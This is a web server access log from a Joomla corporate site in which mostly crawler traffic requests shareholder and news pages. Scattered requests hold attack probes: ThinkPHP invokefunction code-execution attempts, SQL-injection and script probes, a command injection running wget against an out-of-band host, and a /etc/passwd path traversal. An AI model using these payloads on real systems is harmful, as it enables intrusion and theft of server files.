85.208.96.211 - - [24/Aug/2026:20:48:36 +0500] "GET /?function=call_user_func_array&s=%2Findex%2Fthink%2Fapp%2Finvokefunction&start=6&vars%5B0%5D=system&vars%5B1%5D%5B0%5D=echo%20thinkphp%20 HTTP/1.1" 200 46828 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
157.55.39.60 - - [24/Aug/2026:21:01:03 +0500] "GET /officially/certificates HTTP/1.1" 200 38550 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:21:05:40 +0500] "GET /component/mailto/?link=90484268913ca1da66f8087f9717a72b4acd18af&template=accessibility&tmpl=component HTTP/1.1" 200 12935 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.57.162.91 - - [24/Aug/2026:21:07:23 +0500] "GET /jsc-docs/404-conf-int-03-10-16 HTTP/1.1" 200 86278 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.202 - - [24/Aug/2026:21:08:17 +0500] "GET /?start=48&template=%27nvOpzp%3B%20AND%201%3D1%20OR%20%28%3C%27%22%3EiKO%29%29%2C HTTP/1.1" 200 49724 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.132.172.182 - - [24/Aug/2026:21:08:48 +0500] "GET / HTTP/1.1" 200 46126 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
66.132.172.182 - - [24/Aug/2026:21:09:02 +0500] "GET /templates/yoo_master2/favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
34.123.149.87 - - [24/Aug/2026:21:11:26 +0500] "GET /component/mijopolls/?template=yoo_master2 HTTP/1.1" 200 39838 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
217.182.195.176 - - [24/Aug/2026:21:12:12 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:12:14 +0500] "GET /?action=porte_plume_previsu&start=6 HTTP/1.1" 200 45894 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:12:20 +0500] "GET /?locale=locale=de-DE&format=feed&type=atom HTTP/1.1" 200 11836 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.10.180.98 - - [24/Aug/2026:21:12:21 +0500] "GET /?start=6 HTTP/1.1" 200 45837 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
217.182.195.176 - - [24/Aug/2026:21:12:27 +0500] "GET /?locale=locale=de-DE&format=feed&type=rss HTTP/1.1" 200 7511 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:12:35 +0500] "GET /?locale=locale=de-DE&start=54 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:12:48 +0500] "GET /?locale=locale=de-DE&start=6 HTTP/1.1" 200 45877 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:13:07 +0500] "GET /?start=24 HTTP/1.1" 200 48611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:13:30 +0500] "GET /?start=30 HTTP/1.1" 200 46802 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.57.162.91 - - [24/Aug/2026:21:13:42 +0500] "GET /about-org/direction?template=accessibility HTTP/1.1" 200 29162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
217.182.195.176 - - [24/Aug/2026:21:15:32 +0500] "GET /?start=36 HTTP/1.1" 200 45705 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:15:53 +0500] "GET /?start=42 HTTP/1.1" 200 47812 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:16:16 +0500] "GET /?start=48 HTTP/1.1" 200 49389 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:16:31 +0500] "GET /?template=yoo_master2 HTTP/1.1" 200 46147 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:16:50 +0500] "GET /about-org/direction?template=accessibility HTTP/1.1" 200 28603 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:17:00 +0500] "GET /about-org/direction?tmpl=component&print=1 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:17:03 +0500] "GET /about-org/general-info?template=accessibility HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:17:06 +0500] "GET /about-org/general-info?tmpl=component&print=1 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:17:21 +0500] "GET /about-org/history/47-about-org HTTP/1.1" 200 44208 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:17:44 +0500] "GET /about-org/history?template=accessibility HTTP/1.1" 200 31315 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
185.191.171.12 - - [24/Aug/2026:21:17:56 +0500] "GET /?start=6&yandex-source=ru.yandex.yandexmaps%20expr%20954945194%20%2B%20808042689%20 HTTP/1.1" 200 46048 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
217.182.195.176 - - [24/Aug/2026:21:18:02 +0500] "GET /about-org/history?tmpl=component&print=1 HTTP/1.1" 200 11537 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:18:21 +0500] "GET /about-org/indexes/623-balans-2-2025 HTTP/1.1" 200 37372 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:18:38 +0500] "GET /about-org/indexes/626-balans-3-2025 HTTP/1.1" 200 37289 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:19:00 +0500] "GET /about-org/indexes/627-kpe-9-2025 HTTP/1.1" 200 37475 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:19:22 +0500] "GET /about-org/indexes/630-balans-12-2025 HTTP/1.1" 200 37297 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:19:40 +0500] "GET /about-org/indexes/631-kpe-12-2025-mb-xls HTTP/1.1" 200 37529 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:20:02 +0500] "GET /about-org/indexes/635-balans-2025-doc HTTP/1.1" 200 37433 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:20:13 +0500] "GET /about-org/indexes/640-balans-1-2026 HTTP/1.1" 200 37373 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.123.149.87 - - [24/Aug/2026:21:20:17 +0500] "GET /material-facts/589-such-fakt-32-14-03-2024?print=1&tmpl=component HTTP/1.1" 200 27202 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
217.182.195.176 - - [24/Aug/2026:21:20:37 +0500] "GET /about-org/indexes/641-kpe-3-2026-xls HTTP/1.1" 200 37486 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:21:01 +0500] "GET /about-org/indexes/642-kpe-6-2026-xls HTTP/1.1" 200 37504 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:21:22 +0500] "GET /about-org/indexes/643-balans-6-2026-mb-doc HTTP/1.1" 200 37417 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:21:41 +0500] "GET /about-org/indexes?format=feed&type=atom HTTP/1.1" 200 10970 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:21:51 +0500] "GET /about-org/indexes?format=feed&type=rss HTTP/1.1" 200 6687 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:22:11 +0500] "GET /about-org/indexes?start=10 HTTP/1.1" 200 46505 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:24:10 +0500] "GET /about-org/indexes?start=20 HTTP/1.1" 200 46527 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:24:20 +0500] "GET /about-org/indexes?start=30 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
85.208.96.209 - - [24/Aug/2026:21:24:20 +0500] "GET /?author=3&start=24 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
217.182.195.176 - - [24/Aug/2026:21:24:23 +0500] "GET /about-org/indexes?start=70 HTTP/1.1" 200 41385 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:24:39 +0500] "GET /about-org/indexes?template=accessibility HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:24:42 +0500] "GET /about-org/news-and-events/296-provedena-press-konferentsiya-dlya-predstavitelej-smi HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:24:45 +0500] "GET /about-org/news-and-events/297-zbekiston-ududida-immatli-o-ozlar-bilan-bitishuvlar-tuzish-va-ularni-r-jkhatdan-tkazish-tartibi-t-risidagi-nizomga-zgartirishlar-kiritildi HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:24:58 +0500] "GET /about-org/news-and-events/534-news-15-07-2022 HTTP/1.1" 200 43400 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:25:15 +0500] "GET /about-org/news-and-events/537-news-26-07-2022 HTTP/1.1" 200 39915 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:25:35 +0500] "GET /about-org/news-and-events/538-news-05-08-2022 HTTP/1.1" 200 39540 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:25:48 +0500] "GET /about-org/news-and-events/555-news-23-01-2023 HTTP/1.1" 200 38437 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:26:01 +0500] "GET /about-org/news-and-events/556-news-27-01-2023 HTTP/1.1" 200 37224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:26:24 +0500] "GET /about-org/news-and-events/557-news-08-02-2023 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:26:27 +0500] "GET /about-org/news-and-events/581-news-15-12-2023 HTTP/1.1" 200 41443 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:26:49 +0500] "GET /about-org/news-and-events/584-news-16-02-2024 HTTP/1.1" 200 40972 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:26:59 +0500] "GET /about-org/news-and-events/595-news-14-05-2024 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
185.191.171.16 - - [24/Aug/2026:21:26:55 +0500] "GET /officially/strategy/302-biznes-rezhasi-2015 HTTP/1.1" 200 267301 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
217.182.195.176 - - [24/Aug/2026:21:27:10 +0500] "GET /about-org/news-and-events/596-news-04-07-2024 HTTP/1.1" 200 39108 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:27:32 +0500] "GET /about-org/news-and-events/599-news-20-08-2024 HTTP/1.1" 200 39636 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:27:53 +0500] "GET /about-org/news-and-events/600-news-30-09-2024 HTTP/1.1" 200 40289 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:28:05 +0500] "GET /about-org/news-and-events/603-news-28-11-2024 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.61.96.6 - - [24/Aug/2026:21:28:27 +0500] "GET /docs/2026/ustav-2026.pdf HTTP/1.1" 200 1661230 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
217.182.195.176 - - [24/Aug/2026:21:28:23 +0500] "GET /about-org/news-and-events/604-news-24-01-2025 HTTP/1.1" 200 41990 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:28:47 +0500] "GET /about-org/news-and-events/619-news-24-04-2025?tmpl=component&print=1&layout=default HTTP/1.1" 200 9536 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:29:06 +0500] "GET /about-org/news-and-events/622-news-02-07-2025?tmpl=component&print=1&layout=default HTTP/1.1" 200 9536 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:29:26 +0500] "GET /about-org/news-and-events/625-news-10-09-2025?tmpl=component&print=1&layout=default HTTP/1.1" 200 9357 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.171.68.95 - - [24/Aug/2026:21:30:01 +0500] "GET /officially/strategy/492-2018-jil-biznes-rezhasi HTTP/1.1" 200 295708 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:21:30:28 +0500] "GET /info-for-shareholders/366-attention-predpr?print=1&tmpl=component HTTP/1.1" 200 8854 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
217.182.195.176 - - [24/Aug/2026:21:30:33 +0500] "GET /about-org/news-and-events?template=accessibility HTTP/1.1" 200 44474 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:30:51 +0500] "GET /about-org/production?template=accessibility HTTP/1.1" 200 34407 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:31:07 +0500] "GET /about-org/production?tmpl=component&print=1 HTTP/1.1" 200 15344 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:31:17 +0500] "GET /about-org/structure?template=accessibility HTTP/1.1" 200 26931 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:31:27 +0500] "GET /about-org/structure?tmpl=component&print=1 HTTP/1.1" 200 7789 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.171.68.95 - - [24/Aug/2026:21:31:48 +0500] "GET /jsc-docs/397-nabl-sovet-10-09-2019?print=1&tmpl=component HTTP/1.1" 200 8003 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
217.182.195.176 - - [24/Aug/2026:21:31:56 +0500] "GET /acquisition-of-shares-uzb/2-uncategorised HTTP/1.1" 200 54404 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:32:14 +0500] "GET /comissions?format=feed&type=rss HTTP/1.1" 200 6503 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:32:33 +0500] "GET /comissions?template=accessibility HTTP/1.1" 200 30138 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:32:47 +0500] "GET /component/mailto/?tmpl=component&template=accessibility&link=16c693726d877e967913bac684644d7344235ffa HTTP/1.1" 200 12915 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:32:59 +0500] "GET /component/mailto/?tmpl=component&template=accessibility&link=3f4c0fdf9b936e3895c45ed93220c7b191d37c3b HTTP/1.1" 200 12915 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:33:27 +0500] "GET /component/mailto/?tmpl=component&template=accessibility&link=9b674c3b8019c659fd0f493dab4e80a06fa9eb9d HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:33:30 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=010f8e16fec225e6f7082f5b7a8a808d9dca08c3 HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:33:48 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=0397d34275ee97faa33fd834a91015bfb40cb756 HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:34:03 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=0fda889bff2e63c357875c890f214557d2364d7f HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:34:08 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=36bbc22fb0dfdfb99e80a552105cbe4ccb46d1b1 HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:34:23 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=4a15dbae0b42deba192c82f181147438f481ae30 HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:34:33 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=532f4d64d13c3a72d8e82c6d7f1720c438036223 HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:34:45 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=5cb50282c468097b3e631b949577bc54910307d4 HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:34:51 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=633fddd821fabd976d30128c3f00b83af1086ff6 HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.176 - - [24/Aug/2026:21:35:02 +0500] "GET /component/mailto/?tmpl=component&template=yoo_master2&link=7c08412ef5353d4898d0bbbd602dbe3046408c13 HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.171.68.95 - - [24/Aug/2026:21:38:30 +0500] "GET /component/mailto/?link=9c10f74338d1399f050f506981f9551372d3f1bd&template=yoo_master2&tmpl=component HTTP/1.1" 200 13431 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:21:39:30 +0500] "GET /audit/63-for-shareholders HTTP/1.1" 200 47124 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.203 - - [24/Aug/2026:21:46:30 +0500] "GET /?function=call_user_func_array&s=%2FIndex%2F%20hink%EF%BF%BDpp%2Finvokefunction&start=42&vars%5B0%5D=md5&vars%5B1%5D%5B0%5D=HelloThinkPHP21 HTTP/1.1" 200 49872 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
52.4.238.8 - - [24/Aug/2026:21:52:06 +0500] "GET /polls/507-poll-16-03-20 HTTP/1.1" 200 37715 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
35.254.159.230 - - [24/Aug/2026:21:56:47 +0500] "GET /material-facts/524-such-fakt-3615-03-2022 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:22:15:06 +0500] "GET /component/search/?Itemid=283&catid=68&format=opensearch&id=471 HTTP/1.1" 200 750 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:17:22 +0500] "GET /polls/474-poll-10-09-19?print=1&tmpl=component HTTP/1.1" 200 8091 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.15 - - [24/Aug/2026:22:17:37 +0500] "GET /about-org/indexes?start=40 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.56.53.225 - - [24/Aug/2026:22:20:37 +0500] "GET /info-for-shareholders/628-meeting-23-03-2026 HTTP/1.1" 200 42354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
44.205.192.249 - - [24/Aug/2026:22:22:10 +0500] "GET /polls/459-poll-26-04-19 HTTP/1.1" 200 37832 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.236.185.101 - - [24/Aug/2026:22:22:22 +0500] "GET /polls?format=feed&type=atom HTTP/1.1" 200 11073 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
185.191.171.6 - - [24/Aug/2026:22:28:10 +0500] "GET /?mobile_co=1&start=24&uid=1 HTTP/1.1" 200 48168 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.203 - - [24/Aug/2026:22:30:05 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [24/Aug/2026:22:30:06 +0500] "GET /?action=command&command=set_city_timezone&start=54&value=%24%28wget%20http%3A%2F%2Fd5oc186u5ras2lcfutngudshce5uspqcu.oast.live%29%29 HTTP/1.1" 200 51244 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.171.68.95 - - [24/Aug/2026:22:30:22 +0500] "GET /officially/strategy/493-2019-jil-biznes-rezhasi HTTP/1.1" 200 279839 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.212 - - [24/Aug/2026:22:38:07 +0500] "GET /officially/strategy/605-biznes-plan-2026-pdf HTTP/1.1" 200 37388 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
40.77.167.184 - - [24/Aug/2026:22:39:01 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.150 - - [24/Aug/2026:22:39:12 +0500] "GET /info-for-shareholders/366-attention-predpr HTTP/1.1" 200 38485 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
85.208.96.210 - - [24/Aug/2026:22:43:15 +0500] "GET /officially/strategy/391-bussiness-plan-2016 HTTP/1.1" 200 85387 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
94.154.43.146 - - [24/Aug/2026:22:43:31 +0500] "GET / HTTP/1.1" 200 46184 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
3.229.2.217 - - [24/Aug/2026:22:47:04 +0500] "GET /officially/ustav HTTP/1.1" 200 42035 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.61.96.6 - - [24/Aug/2026:22:56:11 +0500] "GET /component/mailto/ HTTP/1.1" 403 846 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.4 - - [24/Aug/2026:22:57:46 +0500] "GET /?sl=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&start=42 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
